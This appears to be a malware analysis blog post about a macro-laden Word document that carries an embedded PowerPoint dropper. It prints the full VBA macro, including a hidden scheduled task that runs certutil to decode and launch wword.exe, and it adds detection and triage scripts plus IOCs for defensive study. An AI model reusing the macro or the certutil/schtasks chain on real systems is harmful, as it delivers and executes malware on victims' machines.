China Navy First Training 2024(CN).docx — Malware Analysis Report

Andrew Petrus
Mar 24, 2024


I recently set out on my regular adventure in search of malware samples to analyze.
I came across the following submission in Malware Bazaar from smica83.
I thought I’d write about what I found.

Let's get started.

The sample is stored with a .doc extension, but TrID identifies it as an Office Open XML (.DOCX) document, i.e. a ZIP container rather than a legacy OLE2 binary .doc file.

remnux@remnux:~/Desktop/samples$ trid 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc 

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found: 14909
Analyzing...

Collecting data from file: 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
51.0% (.DOCX) Word Microsoft Office Open XML Format document (23500/1/4)
38.0% (.ZIP) Open Packaging Conventions container (17500/1/4)
8.6% (.ZIP) ZIP compressed archive (4000/1)
2.1% (.PG/BIN) PrintFox/Pagefox bitmap (640x800) (1000/1)

Judging from all the information we’ve gathered so far, I believe we are dealing with some sort of info/file stealer.

I then ran oleid on the sample, which confirmed the use of VBA macros in this Word document.

remnux@remnux:~/Desktop/samples$ oleid 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc 

XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
oleid 0.60.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

Filename: 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
--------------------+--------------------+----------+--------------------------
Indicator |Value |Risk |Description
--------------------+--------------------+----------+--------------------------
File format |MS Word 2007+ |info |
|Document (.docx) | |
--------------------+--------------------+----------+--------------------------
Container format |OpenXML |info |Container type
--------------------+--------------------+----------+--------------------------
Encrypted |False |none |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros |Yes |Medium |This file contains VBA
| | |macros. No suspicious
| | |keyword was found. Use
| | |olevba and mraptor for
| | |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros |No |none |This file does not contain
| | |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External |1 |HIGH |External relationships
Relationships | | |found: attachedTemplate -
| | |use oleobj for details
--------------------+--------------------+----------+--------------------------

Note that oleid also flags one external relationship of type attachedTemplate at HIGH risk. oleobj prints the target of that relationship, and a remote template location there is worth recording before going further, since an external attached template is the hook used by remote template injection.

Next, I ran olevba to find what macros were hiding.

remnux@remnux:~/Desktop/samples$ olevba 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc

XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.1 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
Type: OpenXML
WARNING Returned info is not complete for PPT types!
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: None - OLE stream: 'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sub BracnchExecution()

    CheckFileInFolder
    ScheduleTask

End Sub
Sub CheckFileInFolder()
    Dim folderPath As String
    Dim fileName As String
    Dim fullPath As String

    folderPath = "C:\~Microsoft365"
    fileName = "support.txt"
    fullPath = folderPath & "\" & fileName
    If Dir(fullPath) <> "" Then
        MsgBox "File not supported!!"
    Else
        Textbox_reader
    End If
End Sub

Sub Test()
    Dim Charts_Path As String
    Charts_Path = "C:\~Microsoft365"
    If Dir(Charts_Path, vbDirectory) = "" Then MkDir Charts_Path
    SetAttr "C:\~Microsoft365", vbHidden Or vbSystem
End Sub
Sub Textbox_reader()
    Test
    Dim myInput As String
    myInput = ActivePresentation.Slides(1).Shapes(1).TextFrame.TextRange.Text
    Set textFile = CreateObject("Scripting.FileSystemObject").CreateTextFile("C:\~Microsoft365\support.txt", True)
    textFile.Write myInput
    textFile.Close
End Sub
Sub ScheduleTask()
    Dim strCommand As String
    strCommand = "schtasks /create /TN windows_updates /SC ONCE /ST 11:11 /TR ""cmd /c certutil -decode C:\~Microsoft365\support.txt C:\~Microsoft365\wword.exe && C:\~Microsoft365\wword.exe"""
    Shell "cmd /c " & strCommand, vbHide
End Sub


+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Write |May write to a file (if combined with Open) |
|Suspicious|CreateTextFile |May create a text file |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|vbHide |May run an executable file or a system |
| | |command |
|Suspicious|create |May execute file or a system command through |
| | |WMI |
|Suspicious|MkDir |May create a directory |
|Suspicious|CreateObject |May create an OLE object |
|IOC |wword.exe |Executable file name |
+----------+--------------------+---------------------------------------------+

INTERESTING…

Looking at the VBA code: the entry point BracnchExecution (the typo is the malware author's) calls CheckFileInFolder and then ScheduleTask. CheckFileInFolder looks for C:\~Microsoft365\support.txt; if that file already exists it only shows a decoy "File not supported!!" message box, otherwise it calls Textbox_reader. Textbox_reader first calls Test, which creates C:\~Microsoft365 and marks the directory hidden and system, then reads the text of the first shape on the first slide of ActivePresentation and writes it unchanged to support.txt. ActivePresentation is a PowerPoint object, not a Word one, so this macro is written to run inside PowerPoint.

Finally, ScheduleTask creates a scheduled task named windows_updates that runs once at 11:11. The task's action has the Windows binary certutil.exe Base64-decode support.txt into wword.exe and then executes wword.exe; the schtasks command itself is launched through Shell with vbHide so no window is shown. (To learn more about how certutil.exe can be abused, check its entry on the LOLBAS project.)
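The two living-off-the-land steps the macro chains together (an Office application creating a scheduled task whose action runs certutil -decode, and certutil decoding a file straight into an executable extension) are exactly what you would want to alert on in process-creation telemetry. The following detection logic is an added example written for this post, not code from the original write-up; the records it runs over are constructed Sysmon-style process creation events (parent image plus command line), not real telemetry, and the first one mirrors the schtasks command line seen in the macro.

```python
"""Detection logic for the schtasks + certutil -decode chain used by the macro.

Added example (not from the original post). SAMPLE_EVENTS are constructed
process-creation records in the shape (parent image, command line).
"""
import re

EXEC_EXTS = {"exe", "dll", "scr", "com", "ps1", "bat", "vbs", "js", "hta"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample events: the first mirrors the macro's ScheduleTask command line,
# the second is the task action once it fires, the last two are benign look-alikes.
SAMPLE_EVENTS = [
    ("C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE",
     'cmd /c schtasks /create /TN windows_updates /SC ONCE /ST 11:11 /TR "cmd /c certutil -decode '
     'C:\\~Microsoft365\\support.txt C:\\~Microsoft365\\wword.exe && C:\\~Microsoft365\\wword.exe"'),
    ("C:\\Windows\\System32\\cmd.exe",
     "certutil -decode C:\\~Microsoft365\\support.txt C:\\~Microsoft365\\wword.exe"),
    ("C:\\Windows\\System32\\cmd.exe",
     "certutil -decode C:\\Temp\\cert.b64 C:\\Temp\\cert.cer"),
    ("C:\\Windows\\explorer.exe",
     'schtasks /create /TN backup /SC DAILY /ST 02:00 /TR "C:\\Tools\\backup.bat"'),
]


def basename(path: str) -> str:
    """Last path component, lower-cased, with surrounding quotes removed."""
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def task_action(cmdline: str):
    """Return the /TR argument of a schtasks command line (quoted or bare), or None."""
    m = re.search(r'/TR\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None


def detect(parent_image: str, cmdline: str) -> list:
    """Return the list of rule names that fire for one process-creation record."""
    alerts = []
    tokens = cmdline.split()
    if not tokens:
        return alerts
    image = basename(tokens[0])
    parent = basename(parent_image)

    # Rule 1: schtasks /create whose action invokes certutil with -decode.
    # The decode step is hidden inside the /TR string, so look there, not at the outer command.
    if re.search(r"\bschtasks(\.exe)?\b", cmdline, re.I) and re.search(r"/create\b", cmdline, re.I):
        action = task_action(cmdline) or ""
        if re.search(r"certutil.*[-/]decode", action, re.I):
            alerts.append("schtasks_action_runs_certutil_decode")
        if parent in OFFICE_PARENTS:
            alerts.append("scheduled_task_created_by_office_app")

    # Rule 2: certutil -decode <in> <out> where <out> has an executable extension.
    if image.startswith("certutil"):
        for i, tok in enumerate(tokens):
            if tok.lower() in ("-decode", "/decode") and i + 2 < len(tokens):
                out_ext = tokens[i + 2].strip('"').rsplit(".", 1)[-1].lower()
                if out_ext in EXEC_EXTS:
                    alerts.append("certutil_decode_to_executable")
                break
    return alerts


def run(events=SAMPLE_EVENTS) -> list:
    """Evaluate every record; returns one alert list per record."""
    return [detect(parent, cmd) for parent, cmd in events]


if __name__ == "__main__":
    for (parent, cmd), hits in zip(SAMPLE_EVENTS, run()):
        print(f"{basename(parent):>14} | {hits or '-'} | {cmd[:70]}")
```

The first rule deliberately inspects only the /TR argument: the outer command line is just cmd running schtasks, and matching "certutil" anywhere in it would also fire on administrators scripting legitimate tasks. The decoy .cer output in the third record shows why the second rule keys on the output extension rather than on certutil -decode alone.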

Now it’s getting fun!

So, as I mentioned above, Certutil is decoding some base64-encoded data and saving the output to an executable. That got me really thinking:

  • What is this Base64 data, and how can we view it?
  • Also, why was text being pulled from the presentation slides when we are dealing with a .DOCX file here?

Since an OOXML document is just a ZIP container, I renamed the sample to .zip and unzipped it to dive deeper.
After some time, I stumbled across a directory named “embeddings” which contained a legacy PowerPoint file named “Microsoft_PowerPoint_97-2003_Presentation.ppt”.

remnux@remnux:~/Desktop/samples/sample-unzipped$ ls
'[Content_Types].xml' docProps _rels word

remnux@remnux:~/Desktop/samples/sample-unzipped$ cd word/
remnux@remnux:~/Desktop/samples/sample-unzipped/word$ ls
document.xml embeddings endnotes.xml fontTable.xml footer1.xml footnotes.xml media numbering.xml _rels settings.xml styles.xml theme webSettings.xml

remnux@remnux:~/Desktop/samples/sample-unzipped/word$ cd embeddings/
remnux@remnux:~/Desktop/samples/sample-unzipped/word/embeddings$ ls
Microsoft_PowerPoint_97-2003_Presentation.ppt
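Both findings so far (oleid's HIGH-risk external attachedTemplate relationship and the embedded .ppt found by unzipping the document) come from the same two places in an OOXML package: the *.rels parts and the word/embeddings/ directory. The script below is an added example for this post, not the author's code, and uses only the Python standard library to surface both in one pass. The document it triages is built in memory as a stand-in (its template URL and file layout are made up for the example; the real sample's attachedTemplate target is not shown on this page).

```python
"""OOXML triage: list external relationships and embedded OLE2 objects.

Added example, not from the original post. Standard library only, so it
runs on a bare REMnux or any Python 3. build_sample_docx() constructs a
stand-in document; it is NOT the real sample.
"""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ODR = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound file header


def external_relationships(zf: zipfile.ZipFile) -> list:
    """(rels part, short relationship type, target) for every TargetMode="External" relationship."""
    found = []
    for name in zf.namelist():
        if not name.endswith(".rels"):
            continue
        root = ET.fromstring(zf.read(name))
        for rel in root.iter("{%s}Relationship" % REL_NS):
            if rel.get("TargetMode") == "External":
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, rtype, rel.get("Target")))
    return found


def embedded_ole_objects(zf: zipfile.ZipFile) -> list:
    """Parts under an embeddings/ directory whose first bytes are the OLE2 magic."""
    return [n for n in zf.namelist()
            if "/embeddings/" in n and zf.read(n)[:8] == OLE_MAGIC]


def triage(data: bytes) -> dict:
    """Run both checks over an OOXML package held in memory."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {"external": external_relationships(zf),
                "ole": embedded_ole_objects(zf)}


def build_sample_docx() -> bytes:
    """Constructed stand-in: one external attachedTemplate relationship (hypothetical URL)
    and one OLE2-shaped embedding named like the one found in the real sample."""
    doc_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%ssettings" Target="settings.xml"/>'
        '<Relationship Id="rId2" Type="%soleObject" '
        'Target="embeddings/Microsoft_PowerPoint_97-2003_Presentation.ppt"/>'
        '</Relationships>' % (REL_NS, ODR, ODR))
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%sattachedTemplate" '
        'Target="http://template.example/t.dotm" TargetMode="External"/>'
        '</Relationships>' % (REL_NS, ODR))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/embeddings/Microsoft_PowerPoint_97-2003_Presentation.ppt",
                    OLE_MAGIC + b"\x00" * 504)
    return buf.getvalue()


if __name__ == "__main__":
    # Pass a real .docx/.pptx path to triage it; with no argument the constructed stand-in is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx()
    for part, rtype, target in triage(blob)["external"]:
        print(f"EXTERNAL {rtype:<18} {target}   ({part})")
    for name in triage(blob)["ole"]:
        print(f"OLE2     {name}")
```

Anything reported as EXTERNAL is a network fetch the document will attempt on open, and every OLE2 part under embeddings/ deserves its own oleid/olevba pass, which is how the macro in this sample is found.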

Running this presentation file through oleid and olevba gave the same results as the .docx, which answers the second question: the VBA project lives in the embedded legacy PowerPoint object (hence olevba's warning about PPT types and the macro's use of ActivePresentation), and the Word document is only the carrier.
So how am I going to extract this Base64 string safely?

Python-PPTX

Python-pptx is a Python library for creating, reading, and updating PowerPoint (.pptx) files.
After converting the .ppt to .pptx (python-pptx does not read the legacy binary .ppt format; LibreOffice's soffice --headless --convert-to pptx is one way to do the conversion), I used this Python script to extract the Base64-encoded string from the slide.

from pptx import Presentation

# Path to the presentation after conversion from the legacy .ppt format
pr_file = "Microsoft_PowerPoint_97-2003_Presentation.pptx"
presentation = Presentation(pr_file)

# The macro reads Slides(1).Shapes(1); python-pptx indexes from 0
slide_index = 0
shape_index = 0

slide = presentation.slides[slide_index]
shape = slide.shapes[shape_index]

if shape.has_text_frame:
    text = shape.text_frame.text
    print("Text inside the shape:", text)
else:
    print("Shape does not contain text.")

The result was a very long Base64-encoded string, and after popping it into CyberChef to decode it, I realized the output was a PE file (it begins with the familiar MZ header).

I found this cool website to convert a Base64-encoded string back into its original executable file (.exe) format. After doing that, I now have a PE to work with. (The same result can be had offline with base64 -d on the REMnux box, which avoids handing the payload to a third-party site.)
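Reproducing the decode locally is worth doing anyway, because it lets you check that what comes out of the slide text really is a PE before you treat it as one, and it lets you record the payload's hash. The script below is an added example for this post, not the author's workflow: certutil_style_decode tolerates what certutil -decode tolerates (PEM-style BEGIN/END armour lines and line breaks), and pe_summary walks the DOS header to the PE signature and COFF header rather than trusting the first two bytes. The payload it runs on is a constructed, minimal PE-shaped byte string, not the real wword.exe.

```python
"""Decode slide text the way certutil -decode would, then verify it is a PE.

Added example, not from the original post. build_fake_pe() constructs a
minimal PE-shaped blob for demonstration; it is not the real payload.
"""
import base64
import hashlib
import struct
import sys


def certutil_style_decode(text: str) -> bytes:
    """Strip PEM-style armour lines and whitespace (certutil -decode accepts both), then decode."""
    lines = [ln.strip() for ln in text.splitlines()]
    body = "".join(ln for ln in lines if ln and not ln.startswith("-----"))
    return base64.b64decode(body, validate=True)


def pe_summary(data: bytes):
    """Return a small dict describing the PE, or None if the bytes are not a PE.

    Layout checked: 'MZ' at 0, e_lfanew at 0x3C, 'PE\\0\\0' at e_lfanew, then the
    20-byte COFF header and the optional header (magic, entry point at +16).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    opt = e_lfanew + 4 + 20
    if opt + 20 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    return {"machine": hex(machine), "sections": nsections,
            "entry_point": hex(entry), "pe32plus": magic == 0x20B,
            "sha256": hashlib.sha256(data).hexdigest()}


def build_fake_pe() -> bytes:
    """Constructed stand-in: DOS header, PE signature, COFF header (i386, 2 sections),
    and a zeroed PE32 optional header with an entry point of 0x1000."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x014C, 2, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)            # AddressOfEntryPoint
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def armour(data: bytes) -> str:
    """Wrap bytes the way a fake-certificate dropper would (64-char lines inside PEM armour)."""
    b64 = base64.b64encode(data).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


def recover(text: str, out_path=None):
    """Decode, refuse to write anything that is not a PE, otherwise optionally write and describe it."""
    data = certutil_style_decode(text)
    info = pe_summary(data)
    if info is None:
        raise ValueError("decoded data is not a PE file")
    if out_path:
        with open(out_path, "wb") as fh:
            fh.write(data)
    return info


if __name__ == "__main__":
    # Usage: python recover.py slide_text.txt [wword.bin]; with no arguments the stand-in is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else armour(build_fake_pe())
    print(recover(text, sys.argv[2] if len(sys.argv) > 2 else None))
```

Writing the decoded payload with a neutral extension such as .bin (as the usage line suggests) keeps it from being double-clicked by accident on the analysis box.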
We’ll continue analyzing this PE in Part 2 of this malware analysis.

VirusTotal

At the time of writing this post, VirusTotal reports 10 vendor detections for the .DOCX file.
We can see that VirusTotal suggests it’s a downloader, which we will touch more on in Part 2 of this write-up.

IOCs

Hash (SHA-256):
2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3
File names:
2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
China Navy First Training 2024(CN) (copy 1).docx
China Navy First Training 2024(CN).docx
Strings:
word/embeddings/Microsoft_PowerPoint_97-2003_Presentation.ppt
Host artifacts (from the macro):
C:\~Microsoft365 (directory created with hidden and system attributes)
C:\~Microsoft365\support.txt (Base64 payload copied from the slide text)
C:\~Microsoft365\wword.exe (decoded PE)
Scheduled task named windows_updates (runs once at 11:11)

In the next stage of this report, I will dive deeper into the executable that we extracted from this document and try to get a better idea of what its purpose is.
Click here to view Part 2 of this malware analysis report.

Feel free to reach out to me on Twitter (@AndrewPetrus) for any questions or comments.
